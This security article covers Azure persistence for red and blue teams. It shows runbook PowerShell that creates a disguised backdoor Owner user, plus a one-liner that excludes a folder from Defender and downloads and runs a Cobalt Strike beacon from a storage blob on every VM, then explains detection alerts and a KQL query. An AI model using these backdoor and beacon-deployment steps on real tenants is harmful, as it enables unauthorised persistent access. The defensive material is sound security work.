Azure Persistence and Detection

Azure.png

Cloud computing is one of the most impactful IT advancements of recent years, growing at a faster rate than perhaps any other technology in the ICT domain. Because of this, it is important to reshape and adapt our “classic” penetration testing techniques to match the new demand for Cloud-based services.

In this article, we will be discussing a number of techniques for achieving persistence in Azure which are based on publicly available information and previous research that has been conducted in this area.

Moreover, we will also showcase how to detect and be alerted when said techniques are used by an attacker.

Azure Runbooks and Automation Accounts

The main prerequisite for successfully leveraging any of the techniques that will be showcased in this article is for the attacker to have already compromised the target Azure environment and escalated their privileges to Global Admin or “Company Administrator” (the Domain Admin equivalent for Azure environments).

How could an attacker retain persistence in an Azure environment even after the Blue Team has discovered their presence and kicked them out (e.g., after revoking Global Admin privileges or removing the compromised account altogether)?

To achieve persistence, we will be leveraging the power of Azure Runbooks and Automation accounts with the goal of attaining two similar but slightly different objectives:

* Creating (or backdooring) an Azure AD user and granting it the Owner role over the target subscription.
* Gaining code execution on the Azure VMs deployed within the subscription.

You can refer to previous research for a step-by-step process on how to prepare the environment, but it essentially boils down to creating an Automation Account with an “Azure Run As” account (the service principal the runbooks will authenticate as) and granting that service principal the privileges needed for the tasks that follow.
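For reference, the Automation Account itself can also be created from PowerShell. The sketch below is a minimal example with illustrative resource names (the Run As account and its extra permissions were configured from the portal):

<# Minimal sketch - the resource group, account name and location are illustrative #>
Import-Module Az.Automation
New-AzAutomationAccount -ResourceGroupName "SplunkIntegrationRG" -Name "SplunkAutomation" -Location "westeurope"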

Azure AD User Creation/Backdooring

Once everything is set up, we can then proceed with the creation of a new PS1 Azure Runbook for the newly created Automation Account.

In order to blend in as much as possible with the target Azure environment, we decided to mimic a Splunk/Azure integration based on official guides/how-tos from the vendors.

To that end, a Splunk-themed naming convention was adopted throughout (e.g., an “AzureAutomationMonitor” runbook and a “splunk_svc” service user).

The actual runbook script consists of PowerShell code that creates a new Azure AD user and grants it Owner privileges over the target subscription. Let’s first try to identify the script’s main “ingredients”:

Importing modules in a runbook (or any PS1 script) should be as easy as doing the following:

Import-Module Az.Accounts
Import-Module Az.Resources

According to this blog article, establishing the connection to the Azure environment should be as easy as:

$connectionName = "AzureRunAsConnection"
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName
Connect-AzAccount -ServicePrincipal -TenantId $servicePrincipalConnection.TenantId -ApplicationId $servicePrincipalConnection.ApplicationId -CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint

Please note that while the article mentions “Connect-AzureAD”, we had to use Connect-AzAccount, as that is what the Az.Accounts module we imported in the PS1 script provides.

After establishing the connection to the Azure AD environment, we will need to:

* Create a new Azure AD user.
* Assign the Owner role over the subscription to that user.

According to Microsoft documentation, we can create a new user with the following PS code:

<# The password needs to be converted into the secure string type first #>
$SecureStringPassword = ConvertTo-SecureString -String "password" -AsPlainText -Force
New-AzADUser -DisplayName "MyDisplayName" -UserPrincipalName "myemail@domain.com" -Password $SecureStringPassword -MailNickname "MyMailNickName"

After creating a new user, the only thing left is to assign the Owner role to said user. Microsoft’s official documentation can help us with that:

New-AzRoleAssignment -SignInName john.doe@contoso.com -RoleDefinitionName Owner

Putting it all together:

<# Import the necessary Az modules for user creation #>
Import-Module Az.Accounts
Import-Module Az.Resources
<# Establish the connection to the Azure environment as the Automation Account's Run As service principal. This is made possible by the AzureRunAsConnection feature. #>
$connectionName = "AzureRunAsConnection"
$servicePrincipalConnection = Get-AutomationConnection -Name $connectionName
Connect-AzAccount -ServicePrincipal -TenantId $servicePrincipalConnection.TenantId -ApplicationId $servicePrincipalConnection.ApplicationId -CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint
<# The user's password needs to be converted into the SecureString type in order to use it during the account creation step. #>
$Secure_String_Pwd = ConvertTo-SecureString <redacted> -AsPlainText -Force
<# Create the new user and keep a reference to it for the role assignment #>
$user = New-AzADUser -DisplayName "splunk_svc" -UserPrincipalName "splunkdev@<redacted>" -Password $Secure_String_Pwd -MailNickname "SplunkDev"
<# Assign the subscription Owner role to the newly created user #>
New-AzRoleAssignment -ObjectId $user.Id -RoleDefinitionName Owner

Runbook script for adding a new Azure AD user with Owner permissions

After creating/publishing the runbook, we will need to create a webhook associated with it, as shown in the following procedure:

1.png
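Once the webhook has been created, the runbook can be triggered remotely with a simple HTTP POST to the webhook URL. The snippet below is a minimal sketch; the URI is a placeholder for the one-time webhook URL that Azure displays at creation time:

<# Hypothetical webhook URI - Azure only shows the real one once, at webhook creation time #>
$webhookUri = "https://<region>.azure-automation.net/webhooks?token=<redacted>"
<# Trigger the runbook; the JSON response contains the ID of the queued job #>
$response = Invoke-RestMethod -Method Post -Uri $webhookUri
$response.JobIds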

The following video showcases the successful execution of the AzureAutomationMonitor runbook, which resulted in the creation of the splunk_svc Azure AD user as a backdoor into the compromised cloud environment:

Azure VMs Persistence

In this section, we will show how an attacker could abuse the runbook feature to compromise Azure VMs in an almost fully automated fashion.

Although there are better and more effective ways of achieving Cloud to on-prem pivoting, being able to gain a shell on all Azure VMs could still be invaluable for an attacker, especially if Active Directory Domain Services are running on an Azure VM (e.g., a Domain Controller hosted in Azure).

To this end, the following steps were performed:

* Prepare a _splunkforwarder.ps1 downloader script to be executed on the target VMs; its core logic boils down to the one-liner shown below.
* Upload the payload (our Cobalt Strike beacon, named indexes.conf) to an Azure storage container.
* Create a runbook that runs _splunkforwarder.ps1 on every VM in the subscription.

Add-MpPreference -ExclusionPath "C:\Programdata"; wget -O "C:\programdata\splunk-7.1.0-setup.exe" https://<storage_account>.blob.core.windows.net/splunkcontainer/indexes.conf; C:\programdata\splunk-7.1.0-setup.exe

The script is only a PoC and is far from being OPSEC safe, so please take that into consideration when testing real Azure environments. To blend in more, we also named our payload indexes.conf, which is a common Splunk filename. The indexes.conf file was hosted on an Azure storage container with a policy that allowed it to be downloaded publicly:

2-2.png

To create a storage container and upload the payloads, you can follow these steps:

On the “Create storage account” page, fill out the required fields (apart from the name, you can leave the default values):

3.png

To make our life easier, we can select the “Blob (anonymous read access for blobs only)” access level, although that is not recommended on live engagements unless you are okay with having your payloads potentially leaked:

4.png
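The same setup can be scripted with the Az storage cmdlets instead of going through the portal; a minimal sketch, with illustrative resource names:

<# Create the storage account (the resource group, name and location are illustrative) #>
$sa = New-AzStorageAccount -ResourceGroupName "SplunkIntegrationRG" -Name "splunkstorageacct" -Location "westeurope" -SkuName Standard_LRS
<# Create a container with anonymous read access for blobs only (the "Blob" access level) #>
New-AzStorageContainer -Name "splunkcontainer" -Context $sa.Context -Permission Blob
<# Upload the payload under its Splunk-themed name #>
Set-AzStorageBlobContent -File ".\indexes.conf" -Container "splunkcontainer" -Blob "indexes.conf" -Context $sa.Context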

Once our assets have been uploaded, we can then proceed with the creation of an Azure runbook that will execute our _splunkforwarder.ps1 script which will in turn download/execute our Cobalt Strike beacon (indexes.conf).

A publicly available script for executing PS1 on Azure VMs was slightly modified to serve our purposes:

5.png
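For reference, the gist of the modified runbook looks roughly like the following sketch. We are assuming here that the VM Run Command feature is used to push the script; names and paths are illustrative:

<# Authenticate as the Automation Account's Run As service principal #>
Import-Module Az.Accounts
Import-Module Az.Compute
$servicePrincipalConnection = Get-AutomationConnection -Name "AzureRunAsConnection"
Connect-AzAccount -ServicePrincipal -TenantId $servicePrincipalConnection.TenantId -ApplicationId $servicePrincipalConnection.ApplicationId -CertificateThumbprint $servicePrincipalConnection.CertificateThumbprint
<# The downloader script is assumed to have been written to a local temp file by an earlier step #>
$scriptPath = "$env:TEMP\_splunkforwarder.ps1"
<# Run the script on every running VM in the subscription via the Run Command feature #>
foreach ($vm in Get-AzVM -Status | Where-Object { $_.PowerState -eq "VM running" }) {
    Invoke-AzVMRunCommand -ResourceGroupName $vm.ResourceGroupName -VMName $vm.Name -CommandId "RunPowerShellScript" -ScriptPath $scriptPath
}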

* Once the script has been modified, we can then create the runbook by clicking on our automation account, then selecting “Runbooks” and finally clicking on “+ Create a runbook” in the top-left corner:

6.png

PS1 Script Execution Artifacts

The execution of PS1 scripts from an Azure Runbook usually creates the following artifacts:

7.png

8.png

The collection and monitoring of said artifacts may help in detecting and responding to a potential ongoing attack where an attacker with privileged access to the Azure environment is trying to expand their reach onto the VMs within the Cloud estate.
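If the runbook relies on the VM Run Command feature (as assumed above), the executed scripts are typically left on disk under the Run Command extension’s download folder, which makes them straightforward to sweep for on a target VM; a minimal sketch:

<# Look for leftover Run Command script files (path used by the RunCommandWindows extension) #>
Get-ChildItem -Path "C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows" -Recurse -Filter "script*.ps1" -ErrorAction SilentlyContinue | Select-Object FullName, LastWriteTime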

Detection

When performing any of the aforementioned persistence techniques, an attacker will leave traces of their activities, and this can be invaluable for the Blue Team to help with early detection of and response to security threats. Traces can be left by actions including but not limited to the following:

* Creation of a new Automation Account, runbook, or webhook.
* Creation of a new Azure AD user.
* Role assignment changes within the subscription (e.g., a new Owner).
* Assignment of the Global Administrator (“Company Administrator”) role to a user.

In this article, we will provide a demonstration on how to detect and receive alerts for the following events:

* Role changes within the Azure subscription.
* Creation of a new Automation Account.
* Assignment of Global Admin (“Company Administrator”) privileges to a user.

These examples can easily be adapted to capture other events as well, such as the creation of a new Automation Runbook.

Setting up the Alert Rules

Monitoring the subscription for any role change

To render the rule creation process easier, let us start by manually generating the event we would like to be alerted on, which in this case is a role change within the Azure subscription. By following this method, we can quickly create an alert rule based on a pre-existing event rather than creating it from scratch.

To do so, we can start by adding a user as the subscription Owner (or any other role) to trigger an event in the Audit Log.

We can then wait a few minutes and click on “Activity log”. That should display a new “Create role assignment” record as shown by the following screenshot:

9.png
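The same event can also be pulled programmatically from the Activity Log, which is handy for confirming the record exists before building the rule; a minimal sketch using the Az.Monitor module:

<# List recent role assignment writes in the current subscription #>
Import-Module Az.Monitor
Get-AzLog -StartTime (Get-Date).AddHours(-1) | Where-Object { $_.OperationName.Value -eq "Microsoft.Authorization/roleAssignments/write" } | Select-Object Caller, EventTimestamp, ResourceId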

At this point, we can create the rule by clicking on the “+ New alert rule” button:

Follow these steps to create the alert rule:

10.png

11.png

12.png

To test the alert rule, add a role assignment to a user and confirm that an email alert is received.

If you receive something like the following, the alert should be working as expected:

13.png

At the end of the article, we will demonstrate a simple way of automating the parsing of such emails, so hang on tight until the end. Please note, though, that if you are serious about detection, you should not rely on email parsing, as that technique was used for PoC purposes only. The best option, both in terms of security and scalability over time, would be to “stream” all Azure-related events to a SIEM solution. Although this may be covered in a future article, please do refer to Microsoft’s documentation for more information.

Automation Account Creation Alerting

We can create an alert for detecting the creation of a new Automation Account in a very similar way: manually create a test Automation Account, locate the corresponding record in the Activity Log, and create a new alert rule from it.
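As with the role-change rule, the underlying Activity Log record can be checked first. The sketch below assumes the Az.Monitor module and filters on the resource provider operation used when an Automation Account is created or updated:

<# List recent Automation Account create/update operations in the current subscription #>
Get-AzLog -StartTime (Get-Date).AddDays(-1) | Where-Object { $_.OperationName.Value -eq "Microsoft.Automation/automationAccounts/write" } | Select-Object Caller, EventTimestamp, ResourceId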

GlobalAdmin Detection

We are going to use a slightly different approach for detecting if a new or existing user has been granted Global Admin privileges.

To summarise, we will need to:

* Create a Log Analytics workspace.
* Configure Azure AD to forward its audit logs to that workspace.
* Create an alert rule based on a custom log search query against the forwarded logs.

Creating a workspace is as easy as going to “Log Analytics workspaces” and clicking on “Create”. Once there, all you need to do is assign the workspace to a resource group and give it a name, which in our case was “AzureLoggingWorkspace”.

14.png
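The same workspace can also be created from PowerShell; a minimal sketch, assuming the Az.OperationalInsights module and an illustrative resource group name:

<# Create the Log Analytics workspace that will receive the Azure AD audit logs #>
Import-Module Az.OperationalInsights
New-AzOperationalInsightsWorkspace -ResourceGroupName "SplunkIntegrationRG" -Name "AzureLoggingWorkspace" -Location "westeurope" -Sku "PerGB2018"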

Once the workspace has been created, we can then proceed to configure Azure AD to forward the logs to our analytics workspace:

15.png

* Click on “Save” and allow some time (it can take a while) for the changes to be applied.

Now for creating the actual email alert:

16.png

* Click on “Add condition” and select “Custom log search”.
* Input the following query as the “Search query” and specify “0” as the Threshold value. Adjust the “Period (in minutes)” and “Frequency (in minutes)” to your liking; it is fine to leave the default value of 5 minutes.

AuditLogs | where OperationName contains "Add member to role" and TargetResources contains "Company Administrator"

17.png

* Click on “Done”.
* Assign an action group to the alert rule and finalise it by specifying a name for the rule.

Parsing the Alerts

Once the alerts have been correctly set up and we’ve confirmed that they are working, we still need to parse the received emails to understand the type of event that occurred in the Azure subscription.

As a PoC, we have developed a small Python script to do just that. To summarise its function:

18.png

Refer to the video below to watch the tool in action:

Download: AzDetect.py

Conclusion

We have shown a few common techniques that attackers may use to achieve persistence within an Azure environment, but we have also focused, towards the end of the article, on how to detect some of the key actions that a malicious actor may perform.

We wanted to show how you can start familiarising yourself with Azure’s built-in tools for security monitoring in order to detect the noisiest events that an attacker could generate.

Instead of relying on email parsing, scalable and robust monitoring and detection capabilities should be built around streaming all Azure-related events (Activity Logs and Azure AD audit logs) to a centralised SIEM solution, as discussed earlier in the article.

References

https://www.blackhillsinfosec.com/breaching-the-cloud-perimeter-w-beau-bullock/

https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/

http://saemundsson.se/?p=726

https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d

https://www.blackhillsinfosec.com/training/breaching-the-cloud-setup-instructions/breaching-the-cloud/

https://dirteam.com/sander/2020/07/22/howto-set-an-alert-to-notify-when-an-additional-person-is-assigned-the-azure-ad-global-administrator-role/

https://www.splunk.com/en_us/blog/platform/splunking-azure-event-hubs.html

https://gotoguy.blog/2018/07/11/using-the-azure-run-as-account-in-azure-automation-to-connect-to-azure-ad-with-a-service-principal/

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.1&viewFallbackFrom=powershell-6

https://docs.microsoft.com/en-us/powershell/module/az.resources/new-azroleassignment?view=azps-6.1.0
